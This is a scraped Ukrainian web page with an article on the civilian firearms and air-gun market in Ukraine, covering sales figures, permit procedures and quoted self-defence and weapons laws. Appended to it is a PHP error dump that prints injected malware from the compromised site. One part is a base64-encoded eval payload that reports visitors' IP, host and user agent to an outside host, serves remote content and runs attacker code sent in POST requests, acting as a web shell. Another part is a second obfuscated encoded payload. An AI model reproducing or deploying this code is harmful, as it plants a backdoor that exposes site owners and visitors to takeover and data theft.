Народна самооборона

Український легіон » Новини » Народна самооборона

Що купують українці

Найходовіший товар зброярів — пневматика і мисливські рушниці. Наприклад, у мережі мисливських магазинів «Ібіс» 60% покупок припадає на мисливські рушниці, 20% — пневматику, 10% — зброю самооборони, 10% — на мілітарі-аксесуари. У магазині «Калібр» 50% виручки приносить пневматика, 25% — мисливські рушниці, 15% — засоби самозахисту, 10% — аксесуари. За оцінками роздрібних торгівців, більш ніж 40% внутрішнього ринку займає пневматична зброя, майже 40% припадає на мисливські рушниці та боєприпаси, по 10% — на засоби самооборони й аксесуари.

Близько 80% товарів на полицях українських зброярів — іноземного виробництва. Українська зброя практично не представлена у двох найбільш масових сегментах: мисливському та пневматичному. Наприклад, в асортименті двох найвідоміших українських зброярів — казенного підприємства НВО «Форт» (м. Вінниця) і СП «Шмайсер» (Київська обл.) — переважають гумокульові та газові пістолети. Мисливську гладкоствольну (Форт ще випускає бойову зброю для армії та МВС) і пневматичну зброю підприємства не випускають. Близько десяти вітчизняних компаній, що працюють на внутрішній ринок, також виробляють переважно пістолети та боєприпаси, контролюючи близько 20% українського ринку зброї для самооборони, полювання та розваги.

Вітчизняні зброярі зароблятимуть у десятки разів більше, якщо українцям дозволять купувати бойові або гумокульові пістолети. Про рівень розвитку збройового бізнесу і таких супутніх розваг, як полювання та спортивна стрільба, можна робити висновки з кількості проданих патронів. В Україні щороку реалізується близько 10 млн боєприпасів. Для порівняння: у Німеччині — 100 млн, Іспанії — 300 млн.

Заради забави

10 млн боєприпасів, — це патрони для вогнепальної зброї. Для пневматичних гвинтівок і пістолетів українці щороку купують сотні мільйонів куль калібру 4,5 мм. Це приблизно 5-10 млн пневматичних пістолетів і гвинтівок вартістю $50-150. Пневматика доступна всім: собівартість пострілу з пневматичної зброї — копійки, не потрібно одержувати дозволу на придбання і носіння пневматики з калібром більш ніж 4,5 мм і швидкістю кулі до 100 м/с (якщо швидкість вильоту кулі вища або більший калібр, така зброя прирівнюється до мисливської).

Пневматика не призначена для самозахисту — По суті, це спортивна зброя, іграшка, але іграшка небезпечна. На відстані 7-10 метрів сталева кулька, випущена з пневматичного пістолета, пробиває наскрізь скляну пляшку з-під шампанського. Пневматика добре продається цілий рік, але влітку спостерігається сплеск продажу: Люди розважаються на дачах, влаштовуючи тир на власному городі.

За статистикою, наприклад, у Німеччині 9 з 10 пострілів з мисливської зброї робиться на тренуваннях або змаганнях. У Європі спортивна стрільба з вогнепальної та пневматичної зброї користується серед населення (зокрема, серед тих, хто не має особистої зброї) великою популярністю. Багато хто захоплюється кульовою, стендовою стрільбою. Практично на всіх стендах пропонують спортинг — імітацію полювання, стрільбу в мішені-тарілки, що летять.

Кому охота

Справжні любителі полювання — найбажаніші покупці у зброярів усього світу. Гладкоствольна мисливська зброя і патрони до неї приносять українському збройовому роздробу до $800 млн на рік.

У Києві не раз проводилися виставки, на яких були представлені збройові доми, що спеціалізуються на виробництві елітної мисливської зброї. Такі рушниці виготовляють понад рік, ціни на них стартують з $0,5 млн. Під час створення елітної зброї враховуються індивідуальні особливості будови тіла замовника. На одному квадратному сантиметрі поверхні металу може бути до мільйона точок гравірування, елітна зброя зазвичай інкрустується дорогоцінними металами. Українські магазини такими рушницями не торгують. Як правило, охочі замовити ексклюзивну рушницю їдуть на завод до Австрії, Німеччини, Іспанії чи Італії.

Мисливська рушниця — єдина доступна українцям вогнепальна зброя. За часів СРСР гладкоствольні рушниці можна було купити тільки за мисливським квитком, без окремого дозволу міліції. Зараз, щоб придбати рушницю, необхідно одержати дозвіл у міліції, але необов’язково бути мисливцем.

З приблизно 2 млн одиниць гладкоствольних рушниць, зареєстрованих в Україні, більшість куплено для самооборони. Українське законодавство лояльне до застосування мисливської зброї з метою захисту власного житла. Утім, перш ніж придбати рушницю для самооборони, слід уважно прочитати ст. 36 і 263 Кримінального кодексу, ст. 190 Кодексу про адміністративні правопорушення, Інструкцію МВС (затверджену Наказом № 622 від 21 серпня 1998 р.) і проконсультуватися з юристом. Порушити кримінальну справу, зокрема, можуть за використання несертифікованого гумокульового патрона або патрона, призначеного для іншого типу зброї.

В обороні

Для самозахисту українцям дозволено купувати газові пістолети і балончики, а представникам деяких професій — зброю під гумову кулю. Річний обсяг усього сегмента засобів самооборони невеликий: його оцінюють приблизно у $100-200 млн.

Дозвіл на придбання пістолетів і револьверів, що стріляють гумовими кулями, видаються тільки працівникам МВС, прокуратури, судів, митниці, їхнім близьким родичам та журналістам. За оцінками продавців зброї, «спецзасобами для стрільби гумовими кулями» в Україні володіють менш ніж 100 тис. осіб, а кількість охочих придбати цей різновид зброї перевищує 2 млн.

Представлені на ринку газові пістолети і балончики — на 90% український товар. Усі пістолети для стрільби гумовими кулями — вітчизняного виробництва: в Україні заборонено продаж імпортної зброї під гумову кулю.


Як купувати Мисливську гладкоствольну зброю та пістолет для стрільби гумовими кулями можуть купити громадяни України, що досягли 21-річного віку. Мисливську нарізну рушницю дозволяється купувати з 25 років, пневматичну зброю (зі швидкістю вильоту кулі бі-льш ніж 100 м/с або калібром понад 4,5 мм) — з 18.

Кількість зброї, якою можна володіти, необмежена, необхідно тільки забезпечити її збереження.

Дозволи на нарізну зброю та під гумову кулю видаються в головному обласному упра-влінні МВС, на газову і гладкоствольну — у райвідділі міліції за місцем проживання.

Щоб отримати дозвіл на придбання будь-якого виду зброї спочатку потрібно пройти медкомісію, одержати довідку і сертифікат нарколога про відсутність протипоказань для володіння зброєю. Вартість послуг медиків — від 150 грн.

У міліції необхідно взяти довідку про відсутність судимості, а від дільничного інспектора — висновок про умови зберігання зброї. Щоб отримати дозвіл дільничного, потрібно обзавестися збройовим сейфом (до $200). Від осіб, що проживають не за місцем прописки, вимагають довідку з ЖЕКу про нинішнє місце проживання.

Для одержання дозволу на мисливську зброю та під гумову кулю необхідні також довідка про закінчення спецкурсів з поводження зі зброєю, характеристика і довідка з місця роботи.

Пістолетом для стрільби гумовими кулями можуть володіти тільки представники певних професій: працівники правоохоронних органів, митниці, судів, їхні близькі родичі, журналісти. Вони надають документи, що підтверджують право на придбання зброї. Наприклад, «пакет» журналіста: свідоцтво про державну реєстрацію видання, в якому він працює, клопотання головного редактора, копія журналістського посвідчення.

У міліції пишеться заява з проханням надати дозвіл на придбання зброї, заповнюється реєстраційна картка, оплачуються послуги дозвільної системи.

З дозволом на руках зброю можна вибирати протягом трьох місяців. Після придбання й укладення договору страхування цивільної відповідальності власник зобов’язаний написати ще одну заяву в міліцію (надати дозвіл на зберігання та носіння зброї), після чого йому видається дозвіл на зберігання та носіння зброї терміном на 3 роки.

При перереєстрації зброї до міліції подаються заява, медична довідка, нові договір страхування цивільної відповідальності й довідка про відсутність судимості, дозвіл на зберігання зброї, квитанції про оплату послуг дозвільної системи. Також необхідно надати зброю для технічного огляду. 

Кримінальний кодекс України

Ч. 5 ст. 36 «Необхідна оборона»

«Не є перевищенням меж необхідної оборони і не має наслідком кримінальну відповідальність застосування зброї... для відвернення протиправного насильницького вторгнення у житло чи інше приміщення незалежно від тяжкості шкоди, яку заподіяно тому, хто посягає».

Кримінальний кодекс України

Ч. 1 ст. 263 «Незаконне поводження зі зброєю»

«Носіння, зберігання, придбання, виготовлення, ремонт, передача чи збут вогнепальної зброї (крім гладкоствольної мисливської), боєприпасів... без передбаченого законом дозволу караються позбавленням волі строком від двох до п’яти років».

Кодекс про адміністративні правопорушення

Ст. 190 «Порушення порядку придбання та зберігання»

«Придбання, зберігання, передача іншим особам або продаж громадянам вогнепальної мисливської..., а також пневматичної зброї калібру понад 4,5 мм і швидкістю польоту кулі понад 100 м/с без дозволу органів внутрішніх справ тягнуть за собою штраф від 51 до 85 грн з конфіскацією зброї або без такої». 

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0154 s(21 Requests)
  PHP: 0,2450 s 
  Total: 0,2604 s